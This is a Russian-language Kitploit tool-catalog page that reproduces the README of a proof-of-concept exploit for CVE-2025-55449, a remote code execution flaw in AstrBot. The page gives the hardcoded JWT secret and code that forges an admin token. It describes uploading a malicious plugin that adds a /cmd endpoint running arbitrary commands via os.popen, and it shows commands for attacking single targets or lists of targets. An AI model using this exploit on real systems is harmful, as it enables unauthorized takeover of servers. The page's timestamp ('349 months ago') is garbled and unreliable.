Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55449 — CVE-2025-55449 EXP | Kitploit
Инструменты/GitHubGitHub/xhh1h/cve-2025-55449
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийАутентификацияРазработка Полезной Нагрузки
GitHubxhh1h/cve-2025-55449

CVE-2025-55449

CVE-2025-55449 EXP

Репозиторий
349 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55449 - Уязвимость удаленного выполнения кода (RCE) в AstrBot

Обзор

Этот репозиторий содержит доказательство концепции эксплойта для CVE-2025-55449, критической уязвимости удаленного выполнения кода (RCE) в AstrBot. Уязвимость позволяет атакующему выполнить произвольный код на целевой системе, используя слабую аутентификацию JWT и механизм установки плагинов.

Описание уязвимости

Уязвимость существует из-за:

  1. Жестко заданного секретного ключа JWT: AstrBot использует жестко заданный секретный ключ JWT (Advanced_System_for_Text_Response_and_Bot_Operations_Tool) для аутентификации, что позволяет атакующим подделывать валидные токены аутентификации.

  2. Неограниченной установки плагинов: Конечная точка /api/plugin/install-upload позволяет аутентифицированным пользователям загружать и устанавливать плагины без надлежащей проверки, обеспечивая выполнение произвольного кода Python.

  3. Выполнения кода через систему плагинов: Система плагинов позволяет плагинам изменять маршрутизацию приложения и выполнять произвольные команды через экземпляр приложения Flask/Quart.

Технические детали

Вектор атаки

  1. Подделка JWT-токена: Эксплойт подделывает JWT-токен, используя жестко заданный секретный ключ с привилегиями администратора.

  2. Уязвимость выполнения кода: Уязвимость удаленного выполнения кода в бэкенде использует встроенную функцию расширения плагинов приложения, позволяя пользователям загружать пользовательские пакеты плагинов. Программа распаковывает пакеты, читает информацию о плагине, импортирует файл Python объекта и выполняет код.

Схема эксплойта

root@kitploit:~
1. Подделать JWT-токен с жестко заданным секретом
2. Создать вредоносный ZIP-файл плагина
3. Отправить POST-запрос к /api/plugin/install-upload с поддельным токеном
4. Плагин устанавливается и добавляет конечную точку /cmd
5. Выполнять команды через /cmd?cmd=<команда>

Требования

  • Python 3.6+
  • Необходимые пакеты Python:
    • jwt (PyJWT)
    • requests
    • zipfile (встроенный)
    • argparse (встроенный)
    • datetime (встроенный)
    • pathlib (встроенный)

Установка

  1. Клонируйте этот репозиторий:
root@kitploit:~
git clone <repository-url>
cd CVE-2025-55449
  1. Установите необходимые зависимости:
root@kitploit:~
pip install PyJWT requests

Использование

Одиночная цель

Запустите эксплойт против одной целевой URL:

root@kitploit:~
python main.py http://target-ip:port

Несколько целей

Создайте файл (ip.txt) с одним URL на строку:

root@kitploit:~
http://target1:6185
http://target2:6185
http://target3:6185

Затем запустите:

root@kitploit:~
python main.py -r ip.txt

Пример вывода

При успешной эксплуатации скрипт выведет:

root@kitploit:~
http://target-ip:port/cmd?cmd=id

После этого вы можете выполнять команды, обращаясь по адресу:

root@kitploit:~
http://target-ip:port/cmd?cmd=<ваша-команда>

Например:

root@kitploit:~
http://target-ip:port/cmd?cmd=whoami
http://target-ip:port/cmd?cmd=ls -la

Структура проекта

root@kitploit:~
CVE-2025-55449/
├── main.py                 # Основной скрипт эксплойта
├── ip.txt                  # Пример файла с целевыми URL
├── README.md              # Этот файл
└── helloworld/            # Директория вредоносного плагина
    ├── main.py            # Код плагина, добавляющий конечную точку /cmd
    ├── metadata.yaml      # Метаданные плагина
    ├── LICENSE            # Лицензия плагина
    └── README.md          # README плагина

Как это работает

Подделка JWT-токена

Эксплойт использует жестко заданный секретный ключ JWT для создания валидного токена аутентификации:

root@kitploit:~
key = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool"
payload = {"username": "admin", "exp": datetime.datetime.utcnow() + datetime.timedelta(days=7)}
forged = jwt.encode(payload, key, algorithm="HS256")

Вредоносный плагин

Плагин (helloworld/main.py) использует систему импорта Python и экземпляр приложения Flask/Quart для внедрения нового маршрута:

root@kitploit:~
# Плагин находит экземпляр приложения Quart и добавляет маршрут /cmd,
# который выполняет произвольные команды через os.popen()

Загрузка плагина

Эксплойт упаковывает плагин в ZIP-файл и загружает его через аутентифицированную конечную точку:

root@kitploit:~
requests.post(
    url + "/api/plugin/install-upload",
    headers={"Authorization": "Bearer " + forged},
    files={"file": (name + ".zip", zip_payload_bytes)}
)
Скачать инструмент